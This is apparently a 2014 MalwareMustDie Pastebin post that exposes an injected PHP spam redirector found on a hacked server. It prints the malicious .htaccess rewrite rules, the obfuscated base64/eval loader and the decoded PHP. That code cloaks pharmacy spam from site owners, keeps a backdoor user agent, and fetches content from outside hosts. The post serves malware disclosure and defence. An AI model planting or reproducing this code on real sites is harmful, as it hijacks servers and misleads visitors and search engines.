SHARE
TWEET

Part2: And another PHP Injected | PHP/Redirector #w00t!

MalwareMustDie Apr 12th, 2014 389 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie Reported Cases FOLLOW
  2. // $ check &&  date
  3. // @unixfreaxjp morgan.freenode.net Saturday April 12 2014 -- 08:14:55 -04:00
  4. // Thanks to ourt friends who reported this evil code.
  5. // #ALERT - SKIDS PHP SERVES MALICIOUS REDIRECTOR!!!!
  6. // Language trace: Indonesia Hacker < Drop dead!!!
  7.  
  8. // Evil .htaccess:
  9. <IfModule mod_rewrite.c>
  10. RewriteEngine On
  11. RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|ANTIPIDERSIA) [OR]
  12. RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol)
  13. RewriteCond %{REQUEST_URI} /$ [OR]
  14. RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
  15. RewriteCond %{REQUEST_FILENAME} !main.php
  16. RewriteCond /var/www/vhosts/sgvch/www/main.php -f
  17. RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
  18. </IfModule>
  19.  
  20.  
  21. // ------------------
  22. // INJECTED CODE
  23. // ------------------
  24.  
  25. <?php Error_Reporting(0); $tpp='/var/www/vhosts/sgvch/tmp'; $xjnOhCWijm7="5Rn9U9s49l+HHQgc
  26. G8pOp5s7EtJzmNjWGDkfBc+c7SgwU/6QeDe2UXO42wBDQkJ770myYycEuG3vh7sLu7Wt96Gnp/cpXX7U2jy4rlTLtb
  27. +Xa2+TzXr9sHIEX5XdN+WdevLu7n50UN0p10cD/uHy4+VHDr9rzz9veIzf8r8sUW6WqkAzXkbzmM8M3ehTP1CDA8C5
  28. wPe27kmEik9dnVg0GPX7/XgUjkbh07hNex6oLwFBoNXSbM0H4EKe/dLe0RYsoVIrlUCmOIm0JmlRL0okUbtnWkwzTG
  29. 65WrMVKBawSsEQhia3PGlQYlP/vBW7ZkvQIWAGgH/0qIfUS6AHABHTg4VWJpUl2OMCNluGzQHWNgy2Mtc3AJy0coOX
  30. sGHBleZVQNhM6AHnH3gUTS8/No9z4+H063yOOjq7FNuMZG1Npyk8FssEaiR+vPxoNZqGnRHzlNoy3E6QNBhzb6LIM3
  31. TiH9NObFIWnVt6plXJLCyyVpaw/ncmZ14r3exHSjcLi6y/W7qHHyndQ1hk/d3SPf5I6R7DIuvvlm7+I6Wbh0XW3y3d
  32. tx8p3bewyPp10l3gj3PhvRdSVM3zKAuumesORDi+Zk3XJayBgQ8Gxzjiuh2KYTKpY7w441T3KOJyZJAGvQrtah7zgs
  33. TreJUWZRVGmy6GlGSF8TJGIMTP8c3hBgA3SZMGlcrBxna5UhlIZLEGuQTgwjqQcPZKpZ82ym8Tr3dMiN3UzOTdYAAL
  34. xclbhtHSKfA72N2ulnFVpuHTdn7AJT7NY6QZBwIoxNcePCuwAeZTOSqf3cZFOpiE+tR/gqhWPijXyrXl3GY1qHUsRc
  35. unsARTWBImST6FcdxLJAXZQUcsnedNuf42cVPOqKNsozNM2JXPn3ng+rRVaRKYNkgiSyO65jn4IPjAD0Zs+AJrdnLQ
  36. 9AlMxdNzzjXS8gk81L9EPAg8HU/TbWoKFudi4Fygur7hUiB22ppJPJBIs6mj03ONIbBB/CaxOo7t91oeg70CfOpZvu
  37. aisclhB7YDyCxg6Kcz+FrTMMkJMRlOcEosxzT0c0i5XWcnfdFplwAwmwwWq3Wdlt4DB2zAHjttwyNN0nXaOml19IKA
  38. ttHtWB1L10x419pAQ0zH0o2mZoMmkCtpGl0QRDxAhYDpEMtoujoslVhWjxEkBfmd047PqOWcQh3TZs6pxhq+gdOeGz
  39. oDYzRTpeqaq4EKHBNcrNeMNLCB/DYK91q2ArGvWf3z6e1fyfC0Mnz3SZNl0IJ+nNEK66/XjspqCDzvVlRGy8jC86Tv
  40. FcznjXCyE4M5LY8MLZ/0deo7u7b3s8GGEuhsUVsjwJDBznlORjHcMk4gYDoY/Bzk4Lmgbd9RTHDNT7iiiiyZczO/R8
  41. e5yAAOpFMzWPLFwd2DpEtDwDJZkEIkSDpKNouKEGpU6U0qTsrzcvm7u1PfONzYL9eqG7uyCpZVYY5MPiuHtVK9tFfa
  42. hmpzxB+nj3zHYPzA6Jn2CDeDWg2DJ3dXUJnWfzks88361jY/PPp5e2OPj4ZRtFGuH0TRfn1fQmbxNIrKO6P7JB79ao
  43. 4WDBqsqd/foRArIKYxnd4Xpr6L5OAyaiQY3J0Ydmd1hsl9jh6+lhHc+3qDcp+KMpja/Ki2zSHXZQqplf92VK7WK0e1
  44. DSy9eZ943ASObeTIoehmDc3jcqfju8hdlcBfGSK2DUHFu8/PoxRfLR3U3+/WymKuw81DyLtuwwXeHoSfYACDVTEVJ6
  45. wgZq5nQULDZ/zL9C5azLSkMqEsUAhuAGZXcHEmbVGY43VndowNyjHTIAdOQ/ybwN9sOhPFpjLYghuK3Of03aFutDQT
  46. xcYPOSr+hTztEwgoIpI8reDBGqPHEubPWfgFpB/LMI41CEdZhoZgRE90Ak9caDiKYCAexUupUHZrumER0V1hEyVrpH
  47. WKX7MolWiVr422FcMbDjOm3AdjmVK52Ijna6pcdZU1RK+LHX86TvwfaFFVQ2jwIORkLsTGmJ9WX6Mt4xTyKonm8ZQH
  48. 7zXTNvremB+NuXrnO3U+jydjTs3hUXXM/fObSfwlnsTfBvwNKMOIZtPp1+nX2ZwfaKAZoxtBZIS/byMxmW0X2v7X6U
  49. SRFY4dPsNG/HP2DfbFtqW3Ih7pMQNKGhewp+lpg8pQtmH4uZ0xaR8WPfSgGoDsKzoB8d5zI6goKBTdhtdg8+kEnVw2
  50. +IoRVB3H3us5CfRlZkLvvl4BWuS0ykLOiIV6ivOieAI5E+5lGdIF5ZZSaIwgA9heBM0Ea9AmzaiUDWEFw6AiDNZU0v
  51. /OFg/SHmtRF+E5yTjrpGAO+A+LDQsblnAUjKSf4xqstmuoUyl4WSBxxFLrFCOI0zspMJqGKQOBKfOCcg+RFgbDP/6Y
  52. 4k9s2uIUCh1/H89uXOIO0oDTIKYtiiWovk07hQpB+w0owaCjI9iHXUGwCq6xiwVcH5xd4ErqQS6ACYwr2J4Y8t3uzj
  53. 7PjSTQfmGh1f7tt7Hw7qzJAyz05Lu2AS5tQQHs3yY+tZP7nRLGERApHt1FCL0fCVIosT2aF2GMvY9PWc83gVlavmWL
  54. 96AuB3QwiEexUURVydcW1AtMuR42XYCXV4ZAldFLqAMCOqIs6wHHUAuI90HFOskal4rfZ+LfhdiCQoIyGdTLkM+EMO
  55. lqxOjKimyjAibAKqpEQpcLUv8MMy+EUEMYmSxeZ4vXh8XrI76q89drz7COKcrTxjdUxYIxVC9QeVPfNw35BNMM+cMU
  56. TRGPDRXxwMaMpOCBxB8IyxbT4V5DNiK3o7iHJbll2DRYSDqIR58hDnefgM9SOG7MKvghBYseZRUu1wlitPu+xmBQig
  57. t+dwjeLk1NKg7qa4wC0SSe/OpDjfYk0SZsgEh0Sj1Qza3BHe2B7UK+GrKOS284caH/k7kx6g4hAg3bht8cZtLaL/IB
  58. xBZr3IzitKnB5Q2eEWDXsqjLbn6Pfl+LcgTBdSjS6k3JhQTLJ5AFp8+JYlJhjDd7aNdrEdcChNAvk4HVQLXc09EmEw
  59. zo0hWv2tRop+iDgQitEi8G24Uk4GXA1Huui2FXYsNG4lTZdIvJ0tCb4iH5b49SpNQ7JUyGWuHeK5NmLgsiHYJ6McS2
  60. INYvqphQ1jdGj0FsB4eC+iDE0JNvzD9kR3rXFp6EWWhzULyzIHfaJwahJjRcBrHYaoR8Dxqn0iEmre1QzPs6bMh5ou
  61. 7MS/kqyvrGVrl0VF+s6FVUB6Xt7dL77dLebn2jtBPyyauoauX6UW2nXtvdqR6Ua4rq4lkSdPNXIx5slLf3qyFPRKyC
  62. uhj2Jk5UaIJP24YvEYjwQ0OYjDtJvHJIIjYuMywxL+1SS8y6vFhlRgXAirmpCvliyb42t/Z+UQaG4qaHQf89djP/nz
  63. AYotnKYP7z+8+LN3bqsDyGvi9Wt5j4Lq7w1PUdX4sVTr9+/ZpFrhda0tvbp1rS4m0nxtPT20XtuU66sbqMgMWI2qFQ
  64. CrZ8Ss3kfm+zXP+ppOrAT9WtUnV4Dk3fBDjJS4l49Ak6XZhCJOXTXNgn7jFWHc/Mn6539QJDlo7q3kLsY/f4VhRlgY
  65. IFcgLRE+TuLRRqofaUiAUFd4/vb+fT6UyeQqbt4O2kgFQ8WJSVmrywUVdLaxYmApM6GLVk7YCVHZCIOxc15L1APy5Q
  66. 59onHiR3V8Oh2beaDddjw+HVveylFHZ2KpkOoOWqQ60nWv61vzPO5eWGUK6glXV2pH7598XIkxuaRcDcluZ/11DJpa
  67. 13lrJzHXmYS9wiy6V3ME/mbRU4xE/s5II77AP2VgOOd1LC+Atzv7bCf+Xkz6o3b7c/XgZhxuDeaf/Ylk3FcyYXJv1k
  68. +RozLRCRS5hJuYKlwidiCQXAvLkVvcZ486yV/i6kFacQyVcyd1lbXI8+sxolhneqfM/TTrEMZO1V8/BO72bTxy8DYe
  69. E9E49BFKYI92LSlOAJRzoTfnIRPf27UEchS4MX4phNtKhn8v9/AQ==";echo preg_replace("/.*/e","\x65\x7
  70. 6\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVj
  71. b2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0djeFVWWm9NbVF4V1hsVE1sazFWWG94YVZsWVRteE9hbE
  72. ptV2tkV2FtSXlVbXhMUTBwYVlsVmFObGRzVWxwTlJtZDVWVzE0V2sxcWJISlhiRVU1VUZOSmNFOTVValJUTWpsWlpV
  73. WlNNV05WU2s1UmVqRnBXVmhPYkU1cVVtWmFSMVpxWWpKU2JFdERTbXBOTVVvMVdXdGtWMlJUU1hCUGVWSTBWVEl4ZE
  74. dRelRteFpiRVpwWTFReGFWbFlUbXhPYWxKbVdrZFdhbUl5VW14TFEwcGFUVzFvTlVscGF6ZEtTR2MxWVVkbmVsSnNi
  75. SEJQV0U1S1dXb3hhVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBwVFRCd2NrbHBhemRLU0doRVVWWm9jbUpVUWpaa1
  76. JtUnJVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkc5NlkwaENhV0pXY0hwWFZtaFRZa05KY0U5M1BUMGlLU2s3
  77. WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NKS1NHaHhZbXM1YjFFeFpIQmhiVEF6VUZOU05GRXdSbGxoTWpCM1pXNV
  78. NXRnBEWjJ0bFJGWkNWMGhhTTFacVNreGFhbXhVUzBOU05HRnROVkJoUlU1WVlWZHdkRTU1YTNCUGVWSTBZMVZhV1ZK
  79. NlNuUldWMmh6VW1vd2EyVkZkSFpYU0doVlpGaEdRMVJWVFc5S1NHaHhZbXM1YjFFeFpIQmhiVEF6UzFSelBTSXBLVH
  80. M9IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhnMVlXOW9TalZ2V1VORlJWTTlKeWM3Wm05eUtDUjRVbmx4VFVvMlMx
  81. TmxkR0U5TURza2VGSjVjVTFLTmt0VFpYUmhQQ1I0Y1VaWVJ6SnRWV2hzUmpza2VGSjVjVTFLTmt0VFpYUmhLeXNwZX
  82. lSNE5XRnZhRW8xYjFsRFJVVlRMajBrZUZOdGJYZHpaV0pSWW5Fb0tDUjRPV2hvTTBaWmFUbHpTV0lvSkhocWJrOW9R
  83. MWRwYW0wM1d5UjRVbmx4VFVvMlMxTmxkR0ZkS1Y0ME16ZzNNakUzTXpjcEtUdDlaWFpoYkNna2VEVmhiMmhLTlc5Wl
  84. EwVkZVeWs3IikpOw=='\x29\x29\x3B",".");return;?>
  85.  
  86.  
  87. // ------------------
  88. // DECODED PHP
  89. // ------------------
  90.  
  91.  
  92. <?php Noneif ($_SERVER['HTTP_USER_AGENT'] <> "FSNET") {
  93.     $srvhst = @$_SERVER['HTTP_HOST'];
  94.     $srvhst = strtolower($srvhst);
  95.     $srvfls = str_replace("www.", "", $srvhst);
  96.     $srvfls = md5($srvfls);
  97.     $cgidir = $_SERVER['DOCUMENT_ROOT'] . '/images/';
  98.     function cpimg($cgidir) {
  99.         $img1 = 'headervg.png';
  100.         $img2 = 'questionvg.png';
  101.         $img3 = 'answer_1_vg.png';
  102.         $img4 = 'answer_2_vg.png';
  103.         $img5 = 'footervg.png';
  104.         $img6 = 'bgvg.png';
  105.         if (!is_dir($cgidir)) { //0
  106.             mkdir($cgidir, 0755);
  107.         }
  108.         if (!is_file($cgidir . $img1)) { //4
  109.             chmod($cgidir, 0755);
  110.             copy('http://solarkey.net/vcl/images/' . $img1, $cgidir . $img1);
  111.         } //4
  112.         if (!is_file($cgidir . $img2)) { //4
  113.             chmod($cgidir, 0755);
  114.             copy('http://solarkey.net/vcl/images/' . $img2, $cgidir . $img2);
  115.         } //4
  116.         if (!is_file($cgidir . $img3)) { //4
  117.             chmod($cgidir, 0755);
  118.             copy('http://solarkey.net/vcl/images/' . $img3, $cgidir . $img3);
  119.         } //4
  120.         if (!is_file($cgidir . $img4)) { //4
  121.             chmod($cgidir, 0755);
  122.             copy('http://solarkey.net/vcl/images/' . $img4, $cgidir . $img4);
  123.         } //4
  124.         if (!is_file($cgidir . $img5)) { //4
  125.             chmod($cgidir, 0755);
  126.             copy('http://solarkey.net/vcl/images/' . $img5, $cgidir . $img5);
  127.         } //4
  128.         if (!is_file($cgidir . $img6)) { //4
  129.             chmod($cgidir, 0755);
  130.             copy('http://solarkey.net/vcl/images/' . $img6, $cgidir . $img6);
  131.         } //4
  132.        
  133.     }
  134.     if (isset($tpp)) {
  135.         $tmppath = $tpp;
  136.         $tppyes = 'T';
  137.     } else {
  138.         if (function_exists('sys_get_temp_dir')) {
  139.             $tmppath = sys_get_temp_dir();
  140.         } else {
  141.             $tmppath = (dirname(__FILE__));
  142.         }
  143.     }
  144.     if (empty($_COOKIE['sukaadmin'])) {
  145.         $google = FALSE;
  146.         $noref = FALSE;
  147.         $paree = FALSE;
  148.         $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
  149.         $server_referer = @$_SERVER['HTTP_REFERER'];
  150.         $srvhstcheckref = str_replace('www.', '', $srvhst);
  151.         $parameter = @$_GET['p'];
  152.         if ((isset($parameter)) && (preg_match('/cialis|cialas|cilis|tadalafil|cialis|ciallis|cialiss|cials|viagra|vigra|vigara|viagar|sildenafil|vagar|vagra|propecia|finasteride|levitra|pharmacy|drugstore|prescription|drugs|generic|vardenafil|rimonabant|prozac|nolvadex|Nolvadex|lexapro|levitra|lasix|glucophage|fosamax|flagyl|finasteride|doxycycline|diflucan|clomid|cipro|amoxil|amoxicillin|acomplia|accutane|drug|zyrtec|zoloft|zithromax|voltaren|viagra|lipitor|nexium/i', $parameter))) {
  153.             $parameter = preg_replace("#[^a-z_-]#i", "", $parameter);
  154.             $paree = TRUE;
  155.             $dir = md5($parameter);
  156.         }
  157.         if (preg_match('/Googlebot|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|http|bot|spider|crawler/i', $server_user_agent)) {
  158.             $google = true;
  159.         }
  160.         if (strlen($server_referer) < 3) {
  161.             $noref = true;
  162.         }
  163.         if (($noref == true) && ($google == FALSE) && ($paree == TRUE)) {
  164.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  165.                 header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
  166.                 echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "
  167. ";
  168.                 echo '<html><head>' . "
  169. ";
  170.                 echo '<title>404 Not Found</title>' . "
  171. ";
  172.                 echo '</head><body>' . "
  173. ";
  174.                 echo '<h1>Not Found</h1>' . "
  175. ";
  176.                 echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "
  177. ";
  178.                 echo '<hr>' . "
  179. ";
  180.                 echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "
  181. ";
  182.                 echo '</body></html>';
  183.                 exit;
  184.             }
  185.         }
  186.         $y2k = mktime(0, 0, 0, 1, 1, 2022);
  187.         if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && ($google == FALSE)) {
  188.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  189.                 setcookie("sukaadmin", "eblan", $y2k, "/", "." . $srvhstcheckref);
  190.                 $location = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  191.                 header("Location: " . $location);
  192.                 exit;
  193.             }
  194.         }
  195.         if (($noref == true) && ($google == FALSE)) {
  196.             if ($_SERVER['HTTP_USER_AGENT'] <> "ANTIPIDERSIA") {
  197.                 setcookie("sukaadmin", "eblan", $y2k, "/", "." . $srvhstcheckref);
  198.                 $location = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  199.                 header("Location: " . $location);
  200.                 exit;
  201.             }
  202.         }
  203.         $time = 15;
  204.         $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";
  205.         $dd = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  206.         $dd = str_replace("&", "%26", $dd);
  207.         $autostop = 0;
  208.         $server_door = 'http://newage-starter.net/startup/comeon_osht501.php';
  209.         $server_links = 'http://newage-starter.net/startup/comelinks_osht501.php';
  210.         $url_new = 'newage-starter.net';
  211.         $path_new = '/startup/comeon_osht501.php';
  212.         $path_links = '/startup/comelinks_osht501.php';
  213.         $server = 'http://solarkey.net/notds/gettheme.php';
  214.         $dir = trim(str_replace('www.', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']));
  215.         $dir = md5($dir);
  216.         if (strstr($secname, "(")) {
  217.             $secfpos = strpos($secname, "(");
  218.             $secname = substr($secname, 0, $secfpos);
  219.         }
  220.         $time = time() - 9900000;
  221.         function checkDir($pap) {
  222.             if ($handle = opendir($pap)) {
  223.                 while (false !== ($file = readdir($handle))) {
  224.                     if ($file != '..' AND $file != '.') {
  225.                         $f++;
  226.                     }
  227.                 }
  228.             } else {
  229.                 $f = "<font color='red'>NO " . $pap . "</font>";
  230.             }
  231.             closedir($handle);
  232.             return $f;
  233.         }
  234.         function scandirphp4($dira) {
  235.             $count = 0;
  236.             $scan = opendir($dira);
  237.             while (($scanfile = readdir($scan))) {
  238.                 $count++;
  239.             }
  240.             closedir($scan);
  241.             $count = $count - 2;
  242.             return $count;
  243.         }
  244.         function do_post_request_new($url_new, $path_new, $data1_new, $data2_new, $data3_new, $data4_new) {
  245.             $socket = fsockopen($url_new, 80, $errno, $errstr, 30);
  246.             if (!$socket) die("$errstr($errno)");
  247.             $data = "srva=" . urlencode($data1_new) . "&refxa=" . urlencode($data2_new) . "&dira=" . urlencode($data3_new) . "&param=" . urlencode($data4_new);
  248.             fwrite($socket, "POST " . $path_new . " HTTP/1.1
  249. ");
  250.             fwrite($socket, "Host: " . $url_new . "
  251. ");
  252.             fwrite($socket, "Content-type: application/x-www-form-urlencoded
  253. ");
  254.             fwrite($socket, "Content-length:" . strlen($data) . "
  255. ");
  256.             fwrite($socket, "Accept:*/*
  257. ");
  258.             fwrite($socket, "User-agent:Opera 10.00
  259. ");
  260.             fwrite($socket, "Connection:Close
  261. ");
  262.             fwrite($socket, "
  263. ");
  264.             fwrite($socket, "$data
  265. ");
  266.             fwrite($socket, "
  267. ");
  268.             $result = '';
  269.             while (!feof($socket)) {
  270.                 $result.= fgets($socket);
  271.             }
  272.             $pos = strpos($result, "
  273.  
  274. ");
  275.             $result = substr($result, $pos + 4);
  276.             return $result;
  277.             fclose($socket);
  278.         }
  279.         function getPage($page, $useragent, $timeout, $str, $dd, $dir, $parameter) {
  280.             $ch = curl_init();
  281.             curl_setopt($ch, CURLOPT_URL, $page);
  282.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  283.             curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
  284.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  285.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  286.             curl_setopt($ch, CURLOPT_POST, 1);
  287.             curl_setopt($ch, CURLOPT_POSTFIELDS, 'srva=' . $str . '&refxa=' . $dd . '&dira=' . $dir . '&param=' . $parameter);
  288.             $result = curl_exec($ch);
  289.             curl_close($ch);
  290.             return $result;
  291.         }
  292.         function getPHMCY($page, $str) {
  293.             $ch = curl_init();
  294.             curl_setopt($ch, CURLOPT_URL, $page);
  295.             curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  296.             curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  297.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  298.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  299.             curl_setopt($ch, CURLOPT_POST, 1);
  300.             curl_setopt($ch, CURLOPT_POSTFIELDS, 'said=' . $str);
  301.             $result = curl_exec($ch);
  302.             curl_close($ch);
  303.             return $result;
  304.         }
  305.         if (!is_dir($tmppath . "/" . $srvfls . "/")) {
  306.             mkdir($tmppath . "/" . $srvfls . "/", 0777);
  307.         }
  308.         if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
  309.             cpimg($cgidir);
  310.             $z = checkDir($tmppath . "/" . $srvfls . "/");
  311.             die("<font color='green'>CHETKO</font>#SMOS-v5.01" . $tppyes . "#" . "tmp: " . $z);
  312.         }
  313.         $papka = ($tmppath . "/" . $srvfls . "/");
  314.         if (function_exists('scandir')) {
  315.             $xk = count(scandir($papka));
  316.         } else {
  317.             $xk = scandirphp4($papka);
  318.         }
  319.         if ($xk >= 5002) {
  320.             $autostop = 1;
  321.         }
  322.         if ($paree == TRUE) {
  323.             if (is_file($tmppath . "/" . $srvfls . "/" . $dir)) {
  324.                 $content = file_get_contents($tmppath . "/" . $srvfls . "/" . $dir);
  325.                 $content = str_replace('<!--nwcmhpst--!>', '', $content);
  326.                 echo $content;
  327.                 exit;
  328.             } else {
  329.                 ////////
  330.                 //////////////
  331.                 if (function_exists('curl_init')) {
  332.                     $new_door = getPage($server_door, $useragent, $time, $srvhst, $dd, $dir, $parameter);
  333.                     if ($new_door == false) {
  334.                         $new_door = do_post_request_new($url_new, $path_new, $srvhst, $dd, $dir, $parameter);
  335.                     }
  336.                 } else {
  337.                     $new_door = do_post_request_new($url_new, $path_new, $srvhst, $dd, $dir, $parameter);
  338.                 }
  339.                 $file = fopen($tmppath . "/" . $srvfls . "/" . $dir, 'w');
  340.                 fwrite($file, $new_door);
  341.                 fclose($file);
  342.                 $new_door = str_replace('<!--nwcmhpst--!>', '', $new_door);
  343.                 echo $new_door;
  344.                 $ptf = $tmppath . "/" . $srvfls . "/" . $dir;
  345.                 $sz = filesize($ptf);
  346.                 if ($sz < 2048) {
  347.                     unlink($ptf);
  348.                 }
  349.                 exit;
  350.             }
  351.             ///////////////////////
  352.             /////////////
  353.            
  354.         }
  355.     }
  356. }
  357. ----
  358. #MalwareMustDie!!
RAW Paste Data
Top